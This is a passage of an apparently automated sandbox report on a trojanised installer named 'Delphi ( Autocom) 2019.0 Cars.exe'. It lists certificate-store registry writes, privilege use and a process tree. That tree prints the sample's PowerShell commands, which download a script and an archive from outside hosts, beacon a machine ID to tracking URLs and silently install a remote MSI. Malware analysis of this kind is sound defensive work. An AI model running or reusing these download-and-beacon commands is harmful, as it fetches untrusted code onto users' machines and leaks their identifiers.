4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd	mot.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	Delphi ( Autocom) 2019.0 Cars.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	Delphi ( Autocom) 2019.0 Cars.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6	mot.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	Delphi ( Autocom) 2019.0 Cars.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 0f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd	mot.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 19000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca61d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e4090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f006700690065007300000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a92000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd	mot.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	Delphi ( Autocom) 2019.0 Cars.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	Delphi ( Autocom) 2019.0 Cars.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	Delphi ( Autocom) 2019.0 Cars.exe

Suspicious behavior: EnumeratesProcesses 16 IoCs

pid	Process
2968	powershell.exe
1488	powershell.exe
1128	msiexec.exe
1128	msiexec.exe
908	powershell.exe
1592	powershell.exe
2032	powershell.exe
3024	powershell.exe
2896	powershell.exe
2720	powershell.exe
2660	powershell.exe
2284	MsiExec.exe
816	MsiExec.exe
816	MsiExec.exe
1128	msiexec.exe
1128	msiexec.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2968	powershell.exe
Token: SeDebugPrivilege	1488	powershell.exe
Token: SeShutdownPrivilege	1680	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1680	msiexec.exe
Token: SeRestorePrivilege	1128	msiexec.exe
Token: SeTakeOwnershipPrivilege	1128	msiexec.exe
Token: SeSecurityPrivilege	1128	msiexec.exe
Token: SeCreateTokenPrivilege	1680	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	1680	msiexec.exe
Token: SeLockMemoryPrivilege	1680	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1680	msiexec.exe
Token: SeMachineAccountPrivilege	1680	msiexec.exe
Token: SeTcbPrivilege	1680	msiexec.exe
Token: SeSecurityPrivilege	1680	msiexec.exe
Token: SeTakeOwnershipPrivilege	1680	msiexec.exe
Token: SeLoadDriverPrivilege	1680	msiexec.exe
Token: SeSystemProfilePrivilege	1680	msiexec.exe
Token: SeSystemtimePrivilege	1680	msiexec.exe
Token: SeProfSingleProcessPrivilege	1680	msiexec.exe
Token: SeIncBasePriorityPrivilege	1680	msiexec.exe
Token: SeCreatePagefilePrivilege	1680	msiexec.exe
Token: SeCreatePermanentPrivilege	1680	msiexec.exe
Token: SeBackupPrivilege	1680	msiexec.exe
Token: SeRestorePrivilege	1680	msiexec.exe
Token: SeShutdownPrivilege	1680	msiexec.exe
Token: SeDebugPrivilege	1680	msiexec.exe
Token: SeAuditPrivilege	1680	msiexec.exe
Token: SeSystemEnvironmentPrivilege	1680	msiexec.exe
Token: SeChangeNotifyPrivilege	1680	msiexec.exe
Token: SeRemoteShutdownPrivilege	1680	msiexec.exe
Token: SeUndockPrivilege	1680	msiexec.exe
Token: SeSyncAgentPrivilege	1680	msiexec.exe
Token: SeEnableDelegationPrivilege	1680	msiexec.exe
Token: SeManageVolumePrivilege	1680	msiexec.exe
Token: SeImpersonatePrivilege	1680	msiexec.exe
Token: SeCreateGlobalPrivilege	1680	msiexec.exe
Token: SeRestorePrivilege	1128	msiexec.exe
Token: SeTakeOwnershipPrivilege	1128	msiexec.exe
Token: SeRestorePrivilege	1128	msiexec.exe
Token: SeTakeOwnershipPrivilege	1128	msiexec.exe
Token: SeRestorePrivilege	1128	msiexec.exe
Token: SeTakeOwnershipPrivilege	1128	msiexec.exe
Token: SeRestorePrivilege	1128	msiexec.exe
Token: SeTakeOwnershipPrivilege	1128	msiexec.exe
Token: SeRestorePrivilege	1128	msiexec.exe
Token: SeTakeOwnershipPrivilege	1128	msiexec.exe
Token: SeRestorePrivilege	1128	msiexec.exe
Token: SeTakeOwnershipPrivilege	1128	msiexec.exe
Token: SeRestorePrivilege	1128	msiexec.exe
Token: SeTakeOwnershipPrivilege	1128	msiexec.exe
Token: SeRestorePrivilege	1128	msiexec.exe
Token: SeTakeOwnershipPrivilege	1128	msiexec.exe
Token: SeRestorePrivilege	1128	msiexec.exe
Token: SeTakeOwnershipPrivilege	1128	msiexec.exe
Token: SeRestorePrivilege	1128	msiexec.exe
Token: SeTakeOwnershipPrivilege	1128	msiexec.exe
Token: SeSecurityPrivilege	1616	wevtutil.exe
Token: SeBackupPrivilege	1616	wevtutil.exe
Token: SeSecurityPrivilege	2380	wevtutil.exe
Token: SeBackupPrivilege	2380	wevtutil.exe
Token: SeRestorePrivilege	1128	msiexec.exe
Token: SeTakeOwnershipPrivilege	1128	msiexec.exe
Token: SeRestorePrivilege	1128	msiexec.exe
Token: SeTakeOwnershipPrivilege	1128	msiexec.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
2348	set_2.tmp
1308	set_3.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2128 wrote to memory of 1252	2128	Delphi ( Autocom) 2019.0 Cars.exe	32
PID 2128 wrote to memory of 1252	2128	Delphi ( Autocom) 2019.0 Cars.exe	32
PID 2128 wrote to memory of 1252	2128	Delphi ( Autocom) 2019.0 Cars.exe	32
PID 2128 wrote to memory of 1252	2128	Delphi ( Autocom) 2019.0 Cars.exe	32
PID 2128 wrote to memory of 1252	2128	Delphi ( Autocom) 2019.0 Cars.exe	32
PID 2128 wrote to memory of 1252	2128	Delphi ( Autocom) 2019.0 Cars.exe	32
PID 2128 wrote to memory of 1252	2128	Delphi ( Autocom) 2019.0 Cars.exe	32
PID 1252 wrote to memory of 1312	1252	mot.exe	34
PID 1252 wrote to memory of 1312	1252	mot.exe	34
PID 1252 wrote to memory of 1312	1252	mot.exe	34
PID 1252 wrote to memory of 1312	1252	mot.exe	34
PID 1252 wrote to memory of 1312	1252	mot.exe	34
PID 1252 wrote to memory of 1312	1252	mot.exe	34
PID 1252 wrote to memory of 1312	1252	mot.exe	34
PID 1312 wrote to memory of 2348	1312	set_2.exe	35
PID 1312 wrote to memory of 2348	1312	set_2.exe	35
PID 1312 wrote to memory of 2348	1312	set_2.exe	35
PID 1312 wrote to memory of 2348	1312	set_2.exe	35
PID 1312 wrote to memory of 2348	1312	set_2.exe	35
PID 1312 wrote to memory of 2348	1312	set_2.exe	35
PID 1312 wrote to memory of 2348	1312	set_2.exe	35
PID 2348 wrote to memory of 2968	2348	set_2.tmp	36
PID 2348 wrote to memory of 2968	2348	set_2.tmp	36
PID 2348 wrote to memory of 2968	2348	set_2.tmp	36
PID 2348 wrote to memory of 2968	2348	set_2.tmp	36
PID 2348 wrote to memory of 2968	2348	set_2.tmp	36
PID 2348 wrote to memory of 2968	2348	set_2.tmp	36
PID 2348 wrote to memory of 2968	2348	set_2.tmp	36
PID 2348 wrote to memory of 1488	2348	set_2.tmp	38
PID 2348 wrote to memory of 1488	2348	set_2.tmp	38
PID 2348 wrote to memory of 1488	2348	set_2.tmp	38
PID 2348 wrote to memory of 1488	2348	set_2.tmp	38
PID 2348 wrote to memory of 1488	2348	set_2.tmp	38
PID 2348 wrote to memory of 1488	2348	set_2.tmp	38
PID 2348 wrote to memory of 1488	2348	set_2.tmp	38
PID 2348 wrote to memory of 1680	2348	set_2.tmp	40
PID 2348 wrote to memory of 1680	2348	set_2.tmp	40
PID 2348 wrote to memory of 1680	2348	set_2.tmp	40
PID 2348 wrote to memory of 1680	2348	set_2.tmp	40
PID 2348 wrote to memory of 1680	2348	set_2.tmp	40
PID 2348 wrote to memory of 1680	2348	set_2.tmp	40
PID 2348 wrote to memory of 1680	2348	set_2.tmp	40
PID 1128 wrote to memory of 2840	1128	msiexec.exe	42
PID 1128 wrote to memory of 2840	1128	msiexec.exe	42
PID 1128 wrote to memory of 2840	1128	msiexec.exe	42
PID 1128 wrote to memory of 2840	1128	msiexec.exe	42
PID 1128 wrote to memory of 2840	1128	msiexec.exe	42
PID 1128 wrote to memory of 2980	1128	msiexec.exe	44
PID 1128 wrote to memory of 2980	1128	msiexec.exe	44
PID 1128 wrote to memory of 2980	1128	msiexec.exe	44
PID 1128 wrote to memory of 2980	1128	msiexec.exe	44
PID 1128 wrote to memory of 2980	1128	msiexec.exe	44
PID 1128 wrote to memory of 2980	1128	msiexec.exe	44
PID 1128 wrote to memory of 2980	1128	msiexec.exe	44
PID 1128 wrote to memory of 836	1128	msiexec.exe	45
PID 1128 wrote to memory of 836	1128	msiexec.exe	45
PID 1128 wrote to memory of 836	1128	msiexec.exe	45
PID 1128 wrote to memory of 836	1128	msiexec.exe	45
PID 1128 wrote to memory of 836	1128	msiexec.exe	45
PID 1128 wrote to memory of 836	1128	msiexec.exe	45
PID 1128 wrote to memory of 836	1128	msiexec.exe	45
PID 836 wrote to memory of 1616	836	MsiExec.exe	46
PID 836 wrote to memory of 1616	836	MsiExec.exe	46
PID 836 wrote to memory of 1616	836	MsiExec.exe	46

C:\Users\Admin\AppData\Local\Temp\Delphi ( Autocom) 2019.0 Cars.exe
"C:\Users\Admin\AppData\Local\Temp\Delphi ( Autocom) 2019.0 Cars.exe"
1⤵
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:2128
- C:\Users\Admin\AppData\Local\Temp\nsy2A2E.tmp\mot.exe
  "C:\Users\Admin\AppData\Local\Temp\nsy2A2E.tmp\mot.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Modifies system certificate store
  - Suspicious use of WriteProcessMemory
  PID:1252
- - C:\Users\Admin\AppData\Local\Temp\nso67BA.tmp\set_2.exe
    "C:\Users\Admin\AppData\Local\Temp\nso67BA.tmp\set_2.exe" /VERYSILENT /SUPPRESSMSGBOXES /CLICKID=2652 /SOURCEID=2652
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1312
  - - C:\Users\Admin\AppData\Local\Temp\is-9B0FC.tmp\set_2.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-9B0FC.tmp\set_2.tmp" /SL5="$C015E,972372,832512,C:\Users\Admin\AppData\Local\Temp\nso67BA.tmp\set_2.exe" /VERYSILENT /SUPPRESSMSGBOXES /CLICKID=2652 /SOURCEID=2652
      4⤵
      Executes dropped EXE
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:2348
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" -command "Invoke-WebRequest -Uri https://test-js-agent.s3.amazonaws.com/event.ps1 -OutFile C:\Users\Admin\AppData\Local\Temp\is-GAQ71.tmp\event.ps1"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2968
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" -Command "Invoke-WebRequest -Uri 'https://resolverapp.com/p?machine_id=e3fd1d67-4513-4809-a7f1-bf54bd53bdbc&publisher_id=2964&event=install&component=agent&click_id='"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1488
    - - C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\System32\msiexec.exe" /I https://nodejs.org/dist/v13.14.0/node-v13.14.0-x64.msi /qn /norestart
        5⤵
        Unknown use of msiexec with remote resource
        Suspicious use of AdjustPrivilegeToken
        
        PID:1680
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" -command "Invoke-WebRequest -Uri 'https://kuchiku.digital/b/e3fd1d67-4513-4809-a7f1-bf54bd53bdbc' -OutFile C:\Users\Admin\AppData\Local\Temp\is-GAQ71.tmp\8456f547-d637-77b2-b529-e5ea4da7b375.zip"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:908
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" -Command "Invoke-WebRequest -Uri 'https://kuchiku.digital/p?machine_id=e3fd1d67-4513-4809-a7f1-bf54bd53bdbc&event=bundle&code=1'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:1592
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" -command "Expand-Archive -Path C:\Users\Admin\AppData\Local\Temp\is-GAQ71.tmp\8456f547-d637-77b2-b529-e5ea4da7b375.zip -DestinationPath C:\Users\Admin\AppData\Local\Temp\is-GAQ71.tmp\8456f547-d637-77b2-b529-e5ea4da7b375 -Force"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:2032
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
